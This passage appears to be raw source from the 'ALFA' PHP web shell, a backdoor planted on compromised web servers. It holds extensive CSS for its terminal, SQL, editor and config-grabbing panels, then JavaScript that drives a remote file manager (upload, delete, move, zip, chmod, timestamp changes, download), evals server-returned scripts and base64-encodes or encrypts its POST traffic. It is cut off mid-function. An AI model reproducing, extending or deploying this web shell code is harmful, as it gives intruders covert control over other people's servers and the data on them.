1459 border: 1px solid #EBEBEB;
1460 border-bottom: 0;
1461}
1462.cl-popup-fixed {
1463 position: fixed;
1464 top: 0;
1465 left: 0;
1466 width: 100%;
1467 height: 100%;
1468 background: #201e1ead;
1469}
1470#shortcutMenu-holder {
1471 position: absolute;
1472 top: 40%;
1473 left: 50%;
1474 transform: translate(-50%, -50%);
1475 background: #1f1e1edb;
1476 height: 190px;
1477 width: 500px;
1478 color: #fff;
1479 /* border-radius: 10px; */
1480 /* padding: 10px;*/
1481}
1482#shortcutMenu-holder > .popup-head {
1483 background: #207174;
1484 padding: 6px;
1485 border-top: 10px;
1486 text-align: center;
1487 font-family: sans-serif;
1488 color: #fff;
1489}
1490#shortcutMenu-holder > form {
1491 padding: 10px;
1492}
1493#shortcutMenu-holder > form > label {
1494 display: block;
1495}
1496#shortcutMenu-holder > form > input {
1497 width: 99%;
1498 height: 24px;
1499 margin-top: 4px;
1500 color: #fff;
1501 outline: none;
1502 font-size: 16px;
1503}
1504#shortcutMenu-holder > .popup-foot {
1505 float: right;
1506 height: 30px;
1507 margin-right: 8px;
1508}
1509#shortcutMenu-holder > .popup-foot > button {
1510 height: 100%;
1511 cursor: pointer;
1512 color: #fff;
1513 outline: none;
1514}
1515.php-terminal-output {
1516 overflow: auto;
1517 height: 86%;
1518 border: 1px solid rgb(30, 86, 115);
1519 border-radius: 10px;
1520}
1521.cmd-history-holder {
1522 visibility: hidden;
1523 opacity: 0;
1524 position: absolute;
1525 color: #dff3d5;
1526 background: #093d58;
1527 top: -300px;
1528 height: 300px;
1529 width: calc(69% + -11px);
1530 border-radius: 10px 10px 0 0;
1531 left: calc(2% - 9px);
1532 transition: visibility 0.5s, opacity 0.5s linear;
1533}
1534.cmd-history-holder .commands-history-header {
1535 background: #37504e;
1536 text-align: center;
1537 border-radius: 10px 10px 0 0;
1538}
1539.cmd-history-icon {
1540 width: 27px;
1541 top: 6px;
1542 left: 67%;
1543 position: absolute;
1544 cursor: pointer;
1545}
1546.history-cmd-line {
1547 padding: 4px;
1548 border-bottom: 1px dashed;
1549 cursor: pointer;
1550}
1551.history-cmd-line:hover {
1552 background: #961111;
1553}
1554#myUL, #myUL ul {
1555 list-style-type: none;
1556}
1557
1558#myUL {
1559 margin: 0;
1560 padding: 0;
1561}
1562
1563.box {
1564 cursor: pointer;
1565 -webkit-user-select: none; /* Safari 3.1+ */
1566 -moz-user-select: none; /* Firefox 2+ */
1567 -ms-user-select: none; /* IE 10+ */
1568 user-select: none;
1569}
1570
1571.box::before {
1572 content: "\2610";
1573 color: black;
1574 display: inline-block;
1575 margin-right: 6px;
1576}
1577
1578.check-box::before {
1579 content: "\2611";
1580 color: dodgerblue;
1581}
1582
1583.nested {
1584 display: none;
1585}
1586
1587.active {
1588 display: block;
1589}
1590.flag-holder > img {
1591 width: 20px;
1592 vertical-align: middle;
1593 padding-left: 6px;
1594}
1595#options_window .content_options_holder .options_holder {
1596 position: relative;
1597 display: none;
1598 overflow: auto;
1599 min-height: 300px;
1600 max-height: calc(100vh - 100px);
1601}
1602#options_window .content_options_holder .options_holder .header {
1603 min-height: 50vh;
1604}
1605#options_window .content_options_holder .options_holder.option_is_active {
1606 display:block;
1607}
1608#options_window .content_options_holder .options_tab {
1609 padding: 5px;
1610 margin-left: 14px;
1611 margin-right: 30px;
1612 background: #000;
1613 border-bottom: 7px solid #0f304a;
1614 border-left: 7px solid #0f304a;
1615 border-right: 7px solid #0f304a;
1616 overflow-x: auto;
1617 white-space: nowrap;
1618}
1619#options_window .content_options_holder .options_tab .tab_name img,
1620.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img {
1621 width: 10px;
1622 vertical-align: middle;
1623 margin-left: 5px;
1624}
1625#options_window .content_options_holder .options_tab .tab_name,
1626.editor-tab-name,.sql-tabs .sql-tabname,.sql-tabs .sql-newtab,.terminal-tabs .terminal-tab {
1627 display: inline-block;
1628 background-color: #133d51;
1629 border-radius: 4px;
1630 padding: 5px;
1631 color: #fff;
1632 margin-right: 3px;
1633 padding: 5px;
1634 cursor: pointer;
1635 margin-bottom: 1px;
1636 transition: background-color .5s;
1637}
1638#options_window .content_options_holder .options_tab .tab_name:hover,
1639.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{
1640 background-color: #a23939;
1641}
1642.editor-tabs,.sql-tabs,.terminal-tabs {
1643 padding: 5px;
1644 overflow-x: auto;
1645 white-space: nowrap;
1646}
1647.options-loader-holder {
1648 position: absolute;
1649 top: 0;
1650 left: 0;
1651 width: 100%;
1652 height: 100%;
1653 background: #2b2626c7;
1654 z-index:11;
1655}
1656.options-loader-holder img {
1657 position: absolute;
1658 top: 32%;
1659 left: 45%;
1660 transform: translate(-50%, -50%);
1661 width: 100px;
1662 animation: spin 2s infinite;
1663}
1664#options_window .content_options_holder .options_tab .tab_name.tab_is_active,
1665.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{
1666 background-color: #009688;
1667}
1668.tab-is-done {
1669 animation:2s tab_change_color infinite step-end;
1670}
1671.stopAjax {
1672 color: #fff;
1673 font-size: 20px;
1674 display: inline-block;
1675 padding: 10px;
1676 cursor: pointer;
1677}
1678#a_loader {
1679 display: none;
1680 position: fixed;
1681 top: 0;
1682 left: 0;
1683 width: 100%;
1684 height: 100%;
1685 background: #2b2626c7;
1686 z-index: 99;
1687}
1688.fmanager-row > td {
1689 position: relative;
1690}
1691.fmanager-row .symlink_path {
1692 position: fixed;
1693 max-width: 100%;
1694 background-color: #0f304a;
1695 border-radius: 10px;
1696 font-size: 15px;
1697 padding: 8px;
1698 color: #fdf4f4;
1699 border: 1px solid #8a8a8a;
1700 z-index: 1;
1701}
1702.archive-icons {
1703 vertical-align: middle;
1704}
1705.archive-type-dir {
1706 font-weight: bolder;
1707}
1708.archive-type-file {
1709 font-weight: unset;
1710}
1711.archive-name {
1712 cursor: pointer;
1713}
1714.archive_dir_holder a {
1715 color: #00FF00;
1716 font-weight: bolder;
1717 cursor: pointer;
1718}
1719.archive_dir_holder a:hover {
1720 color: #fff;
1721}
1722.editor-content {
1723 height: 100%;
1724}
1725.editor-content-holder {
1726 height: 90%;
1727}
1728.editor-contents {
1729 display: none;
1730 position: relative;
1731 height: 100%;
1732}
1733.editor-contents.editor-content-active {
1734 display: block;
1735}
1736.history-panel-controller {
1737 position: absolute;
1738 color: #fff;
1739 padding: 10px;
1740 z-index: 1000;
1741 border-radius: 10px;
1742 top: 50%;
1743 left: 19%;
1744 background-color: #009687;
1745 cursor: pointer;
1746}
1747.sql-content {
1748 display: none;
1749 position: relative;
1750 min-height: 300px;
1751}
1752.sql-content.sql-active-content {
1753 display: block;
1754}
1755.pages-holder {
1756 padding: 7px;
1757}
1758.pages-number {
1759 display: inline-block;
1760 margin-left: 10px;
1761}
1762.pages-holder .pages-number a.page-number{
1763 padding: 5px;
1764 background: #0f304a;
1765 margin-right: 8px;
1766 cursor: pointer;
1767 width: 33px;
1768 display: inline-block;
1769 text-align: center;
1770 border-radius: 5px;
1771 color: #fff;
1772 transition: background .5s;
1773}
1774.active-page-number {
1775 background: #10925c !important;
1776}
1777.pages-number a.page-number:hover {
1778 background: #8a8a8a;
1779}
1780.terminal-content {
1781 height: 100%;
1782}
1783.terminal-content,.terminal-tab {
1784 display: none;
1785}
1786.terminal-content.active-terminal-content {
1787 display: block;
1788 position: relative;
1789}
1790.terminal-btn-fontctl {
1791 background: #009688;
1792 width: 50px;
1793 color: #fff;
1794 font-weight:bolder;
1795 outline: none;
1796 cursor: pointer;
1797}
1798.alert-area {
1799 max-height: 100%;
1800 position: fixed;
1801 bottom: 5px;
1802 left: 20px;
1803 right: 20px;
1804 z-index: 9999;
1805}
1806
1807.alert-box {
1808 font-size: 16px;
1809 color: white;
1810 background: rgba(0, 0, 0, 0.9);
1811 line-height: 1.3em;
1812 padding: 10px 15px;
1813 margin: 5px 10px;
1814 position: relative;
1815 border-radius: 5px;
1816 transition: opacity 0.5s ease-in;
1817 -webkit-animation: alert-shake .5s ease-in-out;
1818 animation: alert-shake .5s ease-in-out;
1819}
1820.alert-content-title {
1821 font-weight: bold;
1822}
1823.alert-box.alert-success {
1824 background: rgba(56, 127, 56, 0.89);
1825}
1826.alert-error{
1827 background: rgba(191, 54, 54, 0.89);
1828}
1829.alert-box.hide {
1830 opacity: 0;
1831}
1832
1833.alert-close {
1834 background: transparent;
1835 width: 12px;
1836 height: 12px;
1837 position: absolute;
1838 top: 15px;
1839 right: 15px;
1840}
1841
1842.alert-close:before,
1843.alert-close:after {
1844 content: "";
1845 width: 15px;
1846 border-top: solid 2px white;
1847 position: absolute;
1848 top: 5px;
1849 right: -1px;
1850 display: block;
1851}
1852
1853.alert-close:before {
1854 transform: rotate(45deg);
1855}
1856
1857.alert-close:after {
1858 transform: rotate(135deg);
1859}
1860
1861.alert-close:hover:before,
1862.alert-close:hover:after {
1863 border-top: solid 2px #d8d8d8;
1864}
1865@media (max-width: 767px) and (min-width: 481px) {
1866 .alert-area {
1867 left: 100px;
1868 right: 100px;
1869 }
1870}
1871@media (min-width: 768px) {
1872 .alert-area {
1873 width: 350px;
1874 left: auto;
1875 right: 0;
1876 z-index: 9999;
1877 }
1878}
1879@keyframes tab_change_color {
1880 0%{ background-color:#133d51; }
1881 50%{ background-color:green; }
1882}
1883@-webkit-keyframes alert-shake {
1884 0% {
1885 -webkit-transform: translateX(0);
1886 }
1887 20% {
1888 -webkit-transform: translateX(-10px);
1889 }
1890 40% {
1891 -webkit-transform: translateX(10px);
1892 }
1893 60% {
1894 -webkit-transform: translateX(-10px);
1895 }
1896 80% {
1897 -webkit-transform: translateX(10px);
1898 }
1899 100% {
1900 -webkit-transform: translateX(0);
1901 }
1902}
1903@keyframes alert-shake {
1904 0% {
1905 transform: translateX(0);
1906 }
1907 20% {
1908 transform: translateX(-10px);
1909 }
1910 40% {
1911 transform: translateX(10px);
1912 }
1913 60% {
1914 transform: translateX(-10px);
1915 }
1916 80% {
1917 transform: translateX(10px);
1918 }
1919 100% {
1920 transform: translateX(0);
1921 }
1922}
1923.textEffect {
1924 position: absolute;
1925 width: 500px;
1926 top: -10px;
1927 animation: alert-shake .5s ease-in-out;
1928 animation-iteration-count: 2;
1929}
1930.alfateam-loader-text {
1931 position: absolute;
1932 color: #46bb45;
1933 top: 23%;
1934 left: 49%;
1935 transform: translate(-50%, -50%);
1936 font-size: 40px;
1937 letter-spacing: 7px;
1938}
1939.alfa-ajax-error {
1940 position: absolute;
1941 color: #ff0a0a;
1942 top: 50%;
1943 left: 50%;
1944 transform: translate(-50%, -50%);
1945 font-size: 30px;
1946}
1947.connection-hist-table {
1948 margin-left:auto;
1949 margin-right:auto;
1950 text-align: justify;
1951 border-collapse: collapse;
1952}
1953.connection-hist-table td, .connection-hist-table th {
1954 border: 1px solid #dddddd;
1955 text-align: left;
1956 padding: 8px;
1957}
1958.connection-his-btn {
1959 margin-bottom: 10px;
1960 padding: 5px;
1961 background: #206920;
1962 color: #fff;
1963 border: none;
1964 outline: none;
1965 cursor: pointer;
1966 font-weight: bold;
1967 transition: background .3s;
1968}
1969.connection-his-btn.connection-delete {
1970 margin: unset;
1971 padding: 5px;
1972 background: #ff0000;
1973 width: 33px;
1974 border-radius: 3px;
1975 transition: background .3s;
1976}
1977.connection-delete:hover {
1978 background: #f56969 !important;
1979}
1980.connection-his-btn:hover {
1981 background: #30b330;
1982}
1983#up_bar_holder {
1984 position: fixed;
1985 z-index: 100000;
1986 width: 100%;
1987}
1988@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}
1989@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}
1990@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}
1991@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}
1992#alfaloader{'.$csscode.'width:100px;height:100px;}
1993#a_loader img{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 31%;left: 45%;}
1994.ajaxarea{border:1px solid #0E304A;color:#67ABDF}.up_bar{margin-bottom: 2px;transition:width 2s;background-color:red;width:0;height:8px;display:none;}#hidden_sh{background-color:#0E304A;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(http://solevisible.com/images/alfabg.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #0E304A;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#59cc33}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#0E304A;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{outline:none;cursor:pointer;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#0E304A;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#0E304A;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#0E304A;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#0E304A}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text],.alfa_custom_cmd_btn{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
1995.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
1996.main th{text-align:left;}
1997.main a{color: #FFF;}
1998.main tr:hover{background-color:#646464;}
1999.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
2000.bigarea{ width:99%; height:300px; }
2001.alfa_custom_cmd_btn {
2002 padding: 5px;
2003 color: #24ff03;
2004 cursor: pointer;
2005}
2006'.alfaCssLoadColors().'
2007</style>';
2008echo "<script type='text/javascript'>
2009var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
2010var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
2011var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
2012var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
2013var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
2014var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
2015var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
2016var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
2017var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
2018var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
2019var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
2020var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
2021var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
2022var d = document;
2023var mysql_cache = {};
2024var editor_files = {};
2025var editor_error = true;
2026var editor_current_file = '';
2027var php_temrinal_using_cgi = false;
2028var is_minimized = false;
2029var cgi_is_minimized = false;
2030var options_window_is_minimized = false;
2031var database_window_is_minimized = false;
2032var rightclick_menu_context = null;
2033var can_hashchange_work = true;
2034var alfa_can_add_opt = false;
2035var alfa_before_do_action_id = '';
2036var alfa_ace_editors = {editor: null, eval: null};
2037var col_dumper_selected_data = {};
2038var _ALFA_AJAX_ = {};
2039var cgi_lang = '';
2040var upcount = 1;
2041var terminal_walk_index = [];
2042var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
2043var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
2044function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
2045if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
2046if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
2047for($j=1;$j<=10;$j++){
2048echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=\'\';';
2049}
2050echo "
2051if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
2052}";?>
2053function fc(e){var a="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",t="",l=!0,o=0;for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(o++,t+="f[]="+alfab64(decodeURIComponent(d.files.elements[i].value))+"&");if(0==o&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder","block"),e.alfa1.value){case"delete":l=!1,d.querySelectorAll("#filesman_holder .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),$("mchk").checked=!1;break;case"copy":case"move":case"zip":case"unzip":l=!1,d.querySelectorAll("#filesman_holder input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,a+t,function(e){alfaloader("filesman_holder","none"),alfaFmngrContextRow()},l,".FilesMan")}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r="";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status&&("function"!=typeof t?d.getElementsByClassName("ajaxarea")[0].innerHTML=o.responseText:i?(d.getElementsByClassName("ajaxarea")[0].innerHTML=o.responseText,t(o.responseText,l)):t(o.responseText,l)),4==o.readyState&&200!=o.status&&alfaAjaxError(o.status,l,o.statusText,o.responseText)},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=new FormData;i.append("a",alfab64(e.a.value)),i.append("c",alfab64(e.c.value)),i.append("alfa1",alfab64(e.alfa1.value)),i.append("charset",alfab64(e.charset.value)),i.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)i.append("f[]",e.files[a]);else i.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var l=1;l<=upcount;l++){var o=$("pfooterup_"+l);o&&o.parentNode.removeChild(o),upcount--}if(0==upcount&&upcount++,0==t)return!1;var r="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+r+"' class='up_bar'></div>");var n=e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var s=$(r);a.upload&&(s.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";s.style.width=i}),a.onload=function(e){200===a.status?s.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status)if(n==e.c.value)if("noperm"!=a.responseText&&"[]"!=a.responseText){var t,i=JSON.parse(a.responseText),l="",o=d.querySelectorAll("#filemanager_table tr").length-3;for(t in i){++o;var r=i[t].name,s=encodeURIComponent(r),c=i[t].size,f=i[t].perm,u=i[t].modify,_=i[t].owner,p=loadType(r,"file");try{d.querySelector(".fmanager-row a[fname='"+r+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+o+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+r+'" class="chkbx" id="checkbox'+o+'"><label for="checkbox'+o+'"></label></div></td><td id="td_row_'+o+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+o+'" id="id_'+o+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&path="+c_+"&file="+s+'" fname="'+r+'" ftype="file" path="'+c_+'" opt_title="">'+r+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+u+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+_+'</span></td><td><a id="id_chmode_'+o+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+o+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+o+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+o+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+o+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+r+"', 'download')\">D</a><a id=\"id_delete_"+o+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}$("filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");else"noperm"!=a.responseText&&"[]"!=a.responseText?alfaShowNotification("File(s) uploaded successfully","Uploader"):alfaShowNotification("Folder has no permission...","Uploader","error")},a.open("POST",d.URL),a.send(i)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value),"FilesMan"==a?alfaloader("filesman_holder","block"):""!=alfa_before_do_action_id?alfaloader(alfa_before_do_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),alfa_before_do_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),alfa_before_do_action_id=loadPopUpOpTions(a)),alfaloader(alfa_before_do_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var 